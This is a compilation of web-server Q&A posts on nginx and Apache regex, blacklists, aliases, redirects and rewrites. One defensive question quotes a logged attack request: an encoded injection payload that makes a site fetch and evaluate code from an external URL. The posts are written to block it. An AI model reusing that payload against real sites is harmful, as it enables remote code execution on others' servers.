Same regex behaving differently in Apache and Nginx - regex

I'm trying to convert the 5G Blacklist from Apache (.htaccess) to Nginx (.conf). There is a line in .htaccess that is causing a problem:
<IfModule mod_alias.c>
RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
</IfModule>
I have converted it to .conf as follows:
Code included in http block:
map $request_uri $bad_uri {
    default 0;
    "~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}
Code included in server block:
if ($bad_uri) {
    return 403;
}
As far as I know, both Apache and Nginx use Perl regex, so no change should be required when converting from the former to the latter. However, the following URIs are giving 403 on Nginx but working fine on Apache:
www.example.com/some,url,with,commas
www.example.com/?q=some,url,with,commas

Finally found the issue.
In Apache, RedirectMatch matches only the URL without the query string, whereas $request_uri in nginx maps to the URL with the query string.
So the correct code for Nginx is:
map $uri $bad_uri {
    default 0;
    "~*(\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")" 1;
}

Related

eval base64 virus - nginx regex prevention

This is a common virus that hits with a post URI like:
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
How to prevent it from going through nginx?
I tried
location ~* base64 {
    return 404;
}
to put down any request with base64 in it but it doesn't work. Please help and give me the right nginx regex rule. (I can't modify the app codebase or update the system).
if ($query_string ~ "base64") {
    return 404;
}
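
Both answers above turn on which part of the request an nginx context matches against: `$request_uri` and `$query_string` carry the raw query, while `$uri` and regex `location` blocks see only the decoded path. The Python sketch below is an added example, not code from either post; `nginx_view`, `hits` and the sample targets are constructed for illustration, and the last branch of the blacklist pattern is simplified.

```python
import re
from urllib.parse import unquote

# The first question's alternation transcribed as a Python regex. Assumption:
# the last branch is simplified to two consecutive double quotes.
BLACKLIST = re.compile(r'(,|\)\+|/,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||"")', re.IGNORECASE)
BASE64 = re.compile(r'base64')  # the second question's pattern, case-sensitive like "~"

def nginx_view(request_target):
    """Approximate what each nginx matching context is given.

    request_uri:  original target, query string included, not decoded
    uri:          path only, percent-decoded; regex locations match this
                  (nginx also merges slashes and resolves dot segments,
                  which this sketch does not model)
    query_string: raw text after the first "?", not decoded
    """
    path, _, query = request_target.partition("?")
    return {"request_uri": request_target, "uri": unquote(path), "query_string": query}

def hits(pattern, request_target):
    """Names of the variables in which `pattern` finds a match."""
    view = nginx_view(request_target)
    return sorted(name for name, value in view.items() if pattern.search(value))

# Constructed sample targets; the first two are the paths from the first
# question, the last is a shortened stand-in for the logged request in the second.
SAMPLES = [
    (BLACKLIST, "/some,url,with,commas"),
    (BLACKLIST, "/?q=some,url,with,commas"),
    (BLACKLIST, "/report%2C2024"),
    (BASE64, "/?name=base64_decode"),
]

if __name__ == "__main__":
    for pattern, target in SAMPLES:
        print(f"{target!r:32} matched in: {hits(pattern, target)}")
```

The third sample shows that `$uri` is decoded before matching, so an encoded comma in the path is seen by a map on `$uri` but not by one on `$request_uri`.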

How do I make a regex nginx location work?

I have the following locations in my nginx config:
server {
    listen 80;
    server_name localhost;
    location ~ ^/(?!api)(.*)/api {
        alias /var/www/api/$1;
    }
    location /api {
        alias /var/www/api/latest;
    }
}
I am trying to match /api as the latest version, and /<version>/api as anything else. The non-regex location is working fine, but I am getting a 403 on the other location.
I don't think it is anything to do with the file and permissions that are being served, as I get a 403 if I try to access
/latest/api
even though these are the same files that are served by
/api
Does anyone have any ideas about why I am getting a 403?
The nginx error is:
directory index of "/var/www/api/latest" is forbidden, client: 172.17.0.1, server: localhost, request: "HEAD /latest/api/ HTTP/1.1", host: "localhost"
The problem is not with the regular expression, but with the use of the alias directive within a regular expression location. See this document for more.
On a related note, rather than using a negative lookahead assertion, you should use the ^~ modifier on the prefix location. See this document for more.
For example:
location ~ ^(/[^/]+)/api(.*)$ {
    alias /var/www/api$1$2;
}
location ^~ /api {
    alias /var/www/api/latest;
}

How to 301 redirect ALL non-existing page to main domain?

I have googled, but most uses are when a person knows their URLs, yet I want to redirect all possible URLs that give 404/503 errors with a 301 to the main domain.
Preferably htaccess, since the site is HTML.
So any request to a page domain.com/XXXX that doesn't exist should redirect to main instead of giving errors, i.e.:
Not Found
The requested URL /eafsdg was not found on this server.
To redirect all non existent and 503 requests to newdomain, you can use
ErrorDocument 404 http://newdomain.com/
ErrorDocument 503 http://newdomain.com/
In NGINX it would be like this:
NOTE: Since I use, and I think a lot of people use, NGINX as a proxy server, this won't redirect bad pages if the location is a proxy; that needs to be configured on the actual server, so I ended up using starkeen's answer on the end Apache server, but thought I'd share for NGINX.
error_page 404 /custom_404.html;
location = /custom_404.html {
    root /usr/share/nginx/html;
    internal;
}
or
error_page 404 /;
location = / {
    root /usr/share/nginx/html;
    internal;
}
https://www.digitalocean.com/community/tutorials/how-to-configure-nginx-to-use-custom-error-pages-on-ubuntu-14-04
Try this .htaccess code to redirect all 404 page to homepage:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . / [L,R=301]

nginx sub-subdomain wildcard

I'm having troubles setting up a reverse proxy for a sub-subdomain using nginx.
I'm trying to create a configuration which allows me to resolve:
a.b.example.com ==> a.local.host.lan
Currently I am able to resolve it as follows:
a.b.example.com ==> a.b.local.host.lan
with the following configuration:
server {
    listen 80;
    server_name ~^(.*)\.b.example\.com$;
    set $servername $1;
    rewrite ^(.*)$ https://$servername.local.host.lan;
}
Any idea how to tokenize the $servername variable so I can split a and b?

Nginx: How to rewrite all URLs except of images?

I'm new to nginx and I want to migrate my website from Apache to nginx. My site has URLs like:
www.mywebsite.com/category/product/balloon
www.mywebsite.com/category/product/shoe
www.mywebsite.com/information/help
etc.
Since I'm using PHP I need to rewrite all URLs to index.php except if it's an image OR if it's a "fake-request". My nginx.config so far:
#block fake requests
location ~* \.(aspx|jsp|cgi)$ {
    return 410;
}
#rewrite all requests if it's not a image
location / {
    root html;
    index index.php 500.html;
    if (!-f $request_filename) {
        rewrite ^(.*)$ /index.php?q=$1 last;
        break;
    }
}
error_page 404 /index.php;
# serve static files directly
location ~* ^.+.(jpg|jpeg|gif|css|png|js|ico)$ {
    access_log off;
}
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
    root html;
}
# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ \.php$ {
    root html;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME E:/test2/html/$fastcgi_script_name;
    include fastcgi_params;
}
This configuration does not work because:
1. It doesn't block fake request to .php files and I can't add .php to (aspx|jsp|cgi)$
2. It doesn't rewrite the URL if the file exists, which is wrong: it should only serve static files directly if it's a defined file type in (jpg|jpeg|gif|css|png|js|ico)$
How can I solve these problems? I really appreciate every answer, clarification or feedback you can give me.
Thanks
Mike
You need to configure the HttpRewriteModule. This module makes it possible to change URI using regular expressions (PCRE), and to redirect and select configuration depending on variables.
If the directives of this module are given at the server level, then they are carried out before the location of the request is determined. If in that selected location there are further rewrite directives, then they also are carried out. If the URI changed as a result of the execution of directives inside location, then location is again determined for the new URI.